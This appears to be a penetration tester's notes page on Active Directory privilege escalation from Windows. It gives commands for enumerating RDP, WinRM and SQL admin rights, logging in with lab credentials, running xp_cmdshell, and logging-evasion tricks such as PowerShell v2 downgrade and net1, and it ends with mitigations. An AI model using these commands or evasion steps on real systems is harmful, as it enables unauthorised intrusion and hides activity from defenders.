Privilege escalation in Active Directory from Windows

Resources

• [TheHacker.recipes](https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword#forcechangepassword

Index of Active Directory

Hardening and auditing Active Directory

Attacking from linux

• Enumerating Active Directory from Linux
• Attacking Active Directory from Linux
• Lateral Movement in Active Directory from Linux
• Privileges escalation in Active Directory from Linux

Attacking from Windows

• Enumerating Active Directory from Windows
• Active directory: connecting to other hosts
• Attacking Active Directory from Windows
• Privileges escalation in Active Directory from Windows

Linux in AD

• Linux in active directory

🔏 Attacking SAM

More on Attacking Sam

🤐 Attacking LSASS

LSASS stores credentials that have active logon sessions on Windows systems. When we dumped LSASS process memory into the file, we essentially took a "snapshot" of what was in memory at that point in time.

More on Attacking LSASS

🌏 Attacking NTDS

By default, the NTDS file (NTDS.dit) is located in %SystemRoot%\NTDS\Ntds.dit of a domain controller. The .dit stands for directory information tree.

More on Attacking NTDS

🔐 Kerberoasting

Kerberoasting is a lateral movement/privilege escalation technique in Active Directory environments.

See more about Kerberoasting

🛂 Access Control List (ACL)Abuse

During an assessment where the client has taken care of all of the "low hanging fruit" AD flaws/misconfigurations, ACL abuse can be a great way for us to move laterally/vertically and even achieve full domain compromise.

See more on Access Control List (ACL)Abuse

⛔ Privileged Access

Sometimes we don't  have local admin rights on any hosts in the domain. However there are other ways to access the host:

• Remote Desktop Protocol (RDP) - is a remote access/management protocol that gives us GUI access to a target host

• PowerShell Remoting - also referred to as PSRemoting or Windows Remote Management (WinRM) access, is a remote access protocol that allows us to run commands or enter an interactive command-line session on a remote host using PowerShell

• MSSQL Server - an account with sysadmin privileges on an SQL Server instance can log into the instance remotely and execute queries against the database.

Via BloodHound we can enumerate the following edges to see what types of remote access privileges a given user has:

• CanRDP
• CanPSRemote
• SQLAdmin

Remote Desktop

Enumerating the Remote Desktop Users Group with PowerView.ps1.

Import-Module .\PowerView.ps1

# Enumerate members accessing current machine
Get-NetLocalGroupMember -GroupName "Remote Desktop Users"

# Enumerate members accessing a given host
Get-NetLocalGroupMember -ComputerName $HostName -GroupName "Remote Desktop Users"
# Example:
# Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Desktop Users"

From Bloodhound, we can check the Analysis tab and run the pre-built queries Find Workstations where Domain Users can RDP or Find Servers where Domain Users can RDP.

Test access with Linux: xfreerdp, rdesktop, Remmina Windows: mstsc.exe.

WinRM

Enumerating the Remote Management Users Group with PowerView.ps1.

Import-Module .\PowerView.ps1

# Enumerate members accessing current machine
Get-NetLocalGroupMember -GroupName "Remote Management Users"

# Enumerate members accessing a given host
Get-NetLocalGroupMember -ComputerName $HostName -GroupName "Remote Management Users"
# Example:
# Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Management Users"

In Bloodhound, we can use this Cypher query and add it as a custom query:

MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2

To access from Linux, use evil-winrm.

evil-winrm -i $ip -u <username -p <password>

evil-winrm -i <ip> -u Administrator -H "<passwordhash>"
# -H: Hash

To access from Windows, use Powershell and the Enter-PSSession cmdlet:

# Create a SecureString object_
$password = ConvertTo-SecureString "$passwordOfUser" -AsPlainText -Force
$cred = new-object System.Management.Automation.PSCredential ("$domain\$userSamAccountName", $password)

# Access the host
Enter-PSSession -ComputerName $hostName -Credential $cred

#####
# Example:
# $password = ConvertTo-SecureString "Klmcargo2" -AsPlainText -Force
# $cred = new-object System.Management.Automation.PSCredential ("INLANEFREIGHT\forend", $password)
# Enter-PSSession -ComputerName ACADEMY-EA-MS01 -Credential $cred

SQL Server Admin

Enumerate via Bloodhound and the SQLAdmin edge. We can check for SQL Admin Rights in the Node Info tab for a given user or use this custom Cypher query to search:

MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:SQLAdmin*1..]->(c:Computer) RETURN p2

Enumerating MSSQL Instances with PowerUpSQL. The command needs to be ran by an user with SQLAdmin rights:

cd C:\Tools\PowerUpSQL\
Import-Module .\PowerUpSQL.ps1
Get-SQLInstanceDomain

Authenticate against the remote SQL server host and run custom queries or operating system commands.

Get-SQLQuery -Verbose -Instance "$ipHost,$port" -username "$domain\$userSamAccountName" -password "$password" -query 'Select @@version'

# Example:
# Get-SQLQuery -Verbose -Instance "172.16.5.150,1433" -username "inlanefreight\damundsen" -password "SQL1234!" -query 'Select @@version'

  We can also authenticate from our Linux attack host using mssqlclient.py from the Impacket toolkit.

mssqlclient.py $domain/$user@$ip -windows-auth
# Example:
# mssqlclient.py INLANEFREIGHT/DAMUNDSEN@172.16.5.150 -windows-auth

We could then choose enable_xp_cmdshell to enable the xp_cmdshell stored procedure which allows for one to execute operating system commands via the database if the account in question has the proper access rights.

SQL> enable_xp_cmdshell

Finally, we can run commands in the format xp_cmdshell <command>.

xp_cmdshell whoami /priv

Finally, we can run commands in the format xp_cmdshell <command>. Here we can enumerate the rights that our user has on the system and see that we have SeImpersonatePrivilege, which can be leveraged in combination with a tool such as JuicyPotato, PrintSpoofer, or RoguePotato to escalate to SYSTEM level privileges, depending on the target host, and use this access to continue toward our goal.

🥔 JuicyPotato

RottenPotatoNG and its variants leverages the privilege escalation chain based on BITS service having the MiTM listener on 127.0.0.1:6666 and when you have SeImpersonate or SeAssignPrimaryToken privileges. During a Windows build review we found a setup where BITS was intentionally disabled and port 6666 was taken.

See more on JuicyPotato

🖨️ PrintNightmare

PrintNightmare is the nickname given to two vulnerabilities (CVE-2021-34527 and CVE-2021-1675) found in the Print Spooler service that runs on all Windows operating systems.

See more on PrintNightmare

🏊 Print Spooler

The Print Spooler exploitation leverages the Windows Print Spooler service in conjunction with the SeImpersonatePrivilege privilege. The goal is to impersonate a SYSTEM token to escalate privileges. Tools like PrintSpoofer automate this process effectively. Below are detailed steps for exploiting this vulnerability:

See more on PrintSpoofer

🪤 NoPac (SamAccountName Spoofing)

Detailed explanations

• noPac: A Tale of Two Vulnerabilities That Could End in Ransomware.
• SAM Name impersonation.

This vulnerability encompasses two CVEs 2021-42278 and 2021-42287, allowing for intra-domain privilege escalation from any standard domain user to Domain Admin level access in one single command.

See more on NoPac (Sam account Spoofing).

💱 Exchange Related Group Membership

See some techniques at: https://github.com/gdedrouas/Exchange-AD-Privesc This repository provides a few techniques and scripts regarding the impact of Microsoft Exchange deployment on Active Directory security. This is a side project of AD-Control-Paths, an AD permissions auditing project to which I recently added some Exchange-related modules.

• The group Exchange Windows Permissions is not listed as a protected group, but members are granted the ability to write a DACL to the domain object.
• The Exchange group Organization Management is another extremely powerful group (effectively the "Domain Admins" of Exchange) and can access the mailboxes of all domain users. It is not uncommon for sysadmins to be members of this group. This group also has full control of the OU called Microsoft Exchange Security Groups, which contains the group Exchange Windows Permissions.

If we can compromise an Exchange server, this will often lead to Domain Admin privileges.

👀 Attacking Domain Trusts # 1: Child -> Parent Trusts

See more on Attacking Domain Trusts

• SidHistory: ExtraSids Attack - Mimikatz
• Cross-Forest Kerberoasting
• Admin Password Re-Use & Group Membership
• SID History Abuse - Cross Forest

🥸 Dumping creds from browser: Lazagne

The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer.

See more about Lazagne.

Evasion Techniques

Downgrade Powershell

Many defenders are unaware that several versions of PowerShell often exist on a host. If not uninstalled, they can still be used. Powershell event logging was introduced as a feature with Powershell 3.0 and forward. With that in mind, we can attempt to call Powershell version 2.0 or older. If successful, our actions from the shell will not be logged in Event Viewer.

With Script Block Logging enabled, we can see that whatever we type into the terminal gets sent to this log. If we downgrade to PowerShell V2, this will no longer function correctly. Our actions after will be masked since Script Block Logging does not work below PowerShell 3.0.

powershell.exe -version 2

PowerShell Operational Logs are kept under under Applications and Services Logs > Microsoft > Windows > PowerShell > Operational. Also the Windows PowerShell log is located at Applications and Services Logs > Windows PowerShell.

Net Commands Trick

Typing net1 instead of net will execute the same functions without the potential trigger from the net string. Example:

net1 user /domain   

Mitigations

1. Auditing for and removing dangerous ACLs

Organizations should have regular AD audits performed but also train internal staff to run tools such as BloodHound and identify potentially dangerous ACLs that can be removed.

1. Monitor group membership

Visibility into important groups is paramount. All high-impact groups in the domain should be monitored to alert IT staff of changes that could be indicative of an ACL attack chain.

1. Audit and monitor for ACL changes

Enabling the Advanced Security Audit Policy can help in detecting unwanted changes, especially Event ID 5136: A directory service object was modified which would indicate that the domain object was modified, which could be indicative of an ACL attack. If we look at the event log after modifying the ACL of the domain object, we will see some event ID 5136 created. If we check out the Details tab, we can see that the pertinent information is written in Security Descriptor Definition Language (SDDL) which is not human readable.

We can use the ConvertFrom-SddlString cmdlet to convert this to a readable format.

# Converting the SDDL String into a Readable Format
ConvertFrom-SddlString "O:BAG:BAD:AI(D;;DC;;;WD)(OA;CI;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CR;00299570-246d-11d0-a768-00aa006e0529;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;CCDCLC;c975c901-[CUT]" 

Last update: 2025-02-23
Created: December 27, 2024 22:00:41